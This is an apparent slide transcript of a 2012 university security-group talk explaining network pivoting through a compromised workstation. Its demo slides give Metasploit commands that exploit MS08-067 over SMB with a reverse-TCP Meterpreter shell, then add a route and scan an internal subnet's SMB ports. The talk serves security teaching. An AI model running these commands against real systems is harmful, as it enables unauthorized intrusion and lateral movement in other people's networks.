1 / 10

Pivoting

Pivoting. UTD Computer Security Group Scott Hand 10 October 2012. Background. Problem: Most of the fun machines are in a private corporate network Solution: Own the machine you can talk to and coerce into owning its friends. Firewall. Pivoting Illustrated. Server. Network Structure:.

ember
Download Presentation

Pivoting

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript

  1. Pivoting UTD Computer Security Group Scott Hand 10 October 2012

  2. Background • Problem: Most of the fun machines are in a private corporate network • Solution: Own the machine you can talk to and coerce into owning its friends

  3. Firewall Pivoting Illustrated Server • Network Structure: Server Workstation Server

  4. Firewall Pivoting Illustrated Server • We can’t access servers! OK! Server Workstation Server DENIED

  5. Firewall Pivoting Illustrated Server • First, own that workstation Server Workstation Exploitstick Server

  6. Firewall Pivoting Illustrated Server • First, own that workstation Server Workstation Exploitstick Server

  7. Firewall Pivoting Illustrated Server • Now it forwards traffic for us Give me datas Server DATA Workstation Exploitstick Server DATA

  8. Firewall Pivoting Illustrated Server • Now it forwards traffic for us Give me datas Server DATA Workstation Exploitstick Server DATA Report

  9. Demo Script – Initial Access • First, own the accessible workstation:use exploit/windows/smb/ms08_067_netapiset RHOST 192.168.124.128set PAYLOAD windows/meterpreter/reverse_tcpset LHOST 192.168.124.129exploit • Once in, check out what NICs are available with ipconfig

  10. Demo Script – Adding Pivot Entry • Now add the route:run autoroute –s 192.168.123.0 –n 255.255.255.0 • Run a quick scan:use auxiliary/scanner/portscan/tcpset RHOSTS 192.168.123.0/24set PORTS 139,445set THREADS 50run • We’re in!

More Related